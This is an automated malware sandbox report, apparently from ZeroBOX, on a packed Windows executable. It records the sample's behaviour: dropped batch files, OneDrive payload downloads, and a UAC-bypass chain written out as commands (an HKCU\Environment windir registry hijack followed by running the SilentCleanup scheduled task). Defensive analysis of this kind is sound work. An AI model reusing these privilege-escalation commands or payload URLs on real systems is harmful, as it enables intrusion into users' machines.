Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 20, 2021, 9:13 a.m.	Aug. 20, 2021, 9:15 a.m.

Size	1.1MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`18bd1660bcab90d7ae7236da4a070918`
SHA256	`f20912c3fa922cf6ec2bb9ce5bbad2aa505ccb7d397a968c76bfc7bd49b458af`
CRC32	`FD57C9D4`
ssdeep	`12288:Qq8SB+x3pPT30Sv6kGDbdYMqFMS7kLWa4H+NZ6rq436TD9dFSKt8Ed8Fj0RIRcDg:r5UzPT3Bv6L9kaDNZAcFSXvVRQyP`
Yara	PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library IsPE32 - (no description)

fibo.exe "C:\Users\test22\AppData\Local\Temp\fibo.exe"
1280
- cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
  3504
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
    3568
    - reg.exe reg delete hkcu\Environment /v windir /f
      3652
    - reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
      3696
    - schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      3740
- cmd.exe cmd /c ""C:\Users\Public\nest.bat" "
  3840
  - reg.exe reg delete hkcu\Environment /v windir /f
    3900

Name	Response	Post-Analysis Lookup
a2ooiw.sn.files.1drv.com	CNAME odc-sn-files-geo.onedrive.akadns.net CNAME sn-files.fe.1drv.com CNAME sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net A 13.107.42.12 CNAME odc-sn-files-brs.onedrive.akadns.net CNAME l-0003.l-msedge.net	13.107.42.12
twistednerd.dvrlists.com	A 62.102.148.152	62.102.148.152
onedrive.live.com	CNAME odc-web-geo.onedrive.akadns.net CNAME l-0004.l-msedge.net A 13.107.42.13 CNAME odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net CNAME odc-web-brs.onedrive.akadns.net	13.107.42.13

IP Address	Status	Action
13.107.42.12	Active	Moloch
13.107.42.13	Active	Moloch
164.124.101.2	Active	Moloch
62.102.148.152	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49164 -> 13.107.42.13:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49165 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49166 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49164 13.107.42.13:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=onedrive.com	24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de
TLSv1 192.168.56.102:49165 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49
TLSv1 192.168.56.102:49166 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 20, 2021, 9:14 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: /min C:\Users\Public\UKO.bat console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: /min reg delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Aug. 20, 2021, 9:14 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.itext

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

RRRTA

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (3 events)

request	GET https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21128&authkey=AHwv5d2XqgZhJTg
request	GET https://a2ooiw.sn.files.1drv.com/y4m-DtusEGdlWhmlRB9W9DH3UrnVHV-LboxupN_yLq3KU4drRJETI9tgtkiUXtXaK5FqWdNquQhyxx9L_gwMLPJUY_k5XNap3ppghjTnPIUW47IPZ_7LmMTNgwxNhuipdELBpTC5ecx-Tgn_IjtpNErT657fkkX2jFJT_IDJQoqSSG2_v9bq7nuKh8C0RynsDJnNPeRRHVd2P8852lisgHDgg/Dhfjtcfiwqjptzsveipvvutmlisezrk?download&psid=1
request	GET https://a2ooiw.sn.files.1drv.com/y4mE7XbSQXuZC9yYWp7AUZU0ZKgvmTacBuyD7WsIASM6IO9-p1TuQ8utdj6pKiooBRT7NSppFynY2HU1E7LUO7MTQprfN3i3jeghtE0I055rFBxTM0RGdo2IK0TDKRmgj68KbY9MMsf_ejwdv1lkwxXjAuH1OrWGGrYHCcD-ohf6XGb9Nv4UPD9_gKiMQXEj0jeN9Iazhno6ozmNeNyI-iWlg/Dhfjtcfiwqjptzsveipvvutmlisezrk?download&psid=1

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1280 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Creates executable files on the filesystem (5 events)

file	C:\Users\Public\KDECO.bat
file	C:\Users\Public\UKO.bat
file	C:\Users\Public\Libraries\Dhfjtcf\Dhfjtcf.exe
file	C:\Users\Public\Trast.bat
file	C:\Users\Public\nest.bat

Creates a suspicious process (3 events)

cmdline	C:\Windows\System32\mshta.exe
cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 94208 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x04b81000 process_handle: 0xffffffff	1	0	0

Yara rule detected in process memory (50 out of 60 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	reg delete hkcu\Environment /v windir /f
cmdline	reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: c4086d349851623e196c64b89c987e37286483c3

Allocates execute permission to another process indicative of possible code injection (50 out of 1103 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00020000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00030000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00120000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00130000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00140000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00150000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00160000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00170000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00180000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00190000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00280000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00290000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00300000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00310000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00320000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00330000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00340000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00450000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00490000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00500000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00510000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00530000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00540000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1
